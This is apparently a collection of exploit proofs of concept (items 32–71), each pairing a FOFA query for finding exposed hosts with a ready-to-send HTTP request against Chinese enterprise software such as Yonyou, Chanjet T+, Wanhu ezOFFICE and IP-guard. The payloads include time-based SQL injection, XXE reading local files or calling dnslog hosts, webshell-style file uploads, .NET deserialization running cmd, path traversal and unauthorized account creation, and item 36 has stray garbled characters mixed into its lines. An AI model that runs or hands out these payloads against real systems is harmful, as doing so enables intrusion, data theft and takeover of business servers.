GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

$ p/ |* P' O* o, g8 [( l36. 用友NC-Cloud soapFormat XXE
% l1 X$ T6 u8 t U$ y# |: DFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"$ F c( ]1 j2 ? |
POST /uapws/soapFormat.ajax HTTP/1.1 Z4 t1 z" a Q; a. g! }6 P
Host: 192.168.40.130:8989! {$ e8 Y' O% A; }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.04 P; P& H6 p9 K! R/ u0 u
Content-Length: 263, ~, B( g/ ~8 c( V7 g& W- U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 n4 }. x9 n1 Q$ G: U' T
Accept-Encoding: gzip, deflate
. z, O, q0 m, n5 M5 o5 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 z' W Q+ c1 a6 k5 oConnection: close
: N3 d( X3 L/ p7 l" |' r9 IContent-Type: application/x-www-form-urlencoded
4 d, P* z" m: f: o* _4 HUpgrade-Insecure-Requests: 1( ]3 c6 G$ [5 F3 b Z6 S# \
; p+ ~0 K6 a0 Q5 h- N3 d+ l$ l' v
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
, b/ @2 t+ R* j, y
7 A! n& V, N; U2 c/ U$ E3 F# g7 u+ Y) p* P8 A
37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

The uploaded file is then reachable at:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
 <soapenv:Header/>
 <soapenv:Body>
  <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
   <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
  </ser:getUserNameById>
 </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is then reachable at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Socialized Business ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 (Zheda Enter) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file written by the injected echo:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
Time-based: a vulnerable target answers about 5 seconds late.
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
An HTTP 200 response means the account test123456 / 123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 the UNION selects), the vulnerability is present.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
The ;.js suffix is there to get past filters that exempt static-resource extensions; time-based, a vulnerable target answers about 5 seconds late.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success.aspx command execution
FOFA:app="万户网络-ezEIP"
The SID header carries the command base64-encoded; dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini.
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
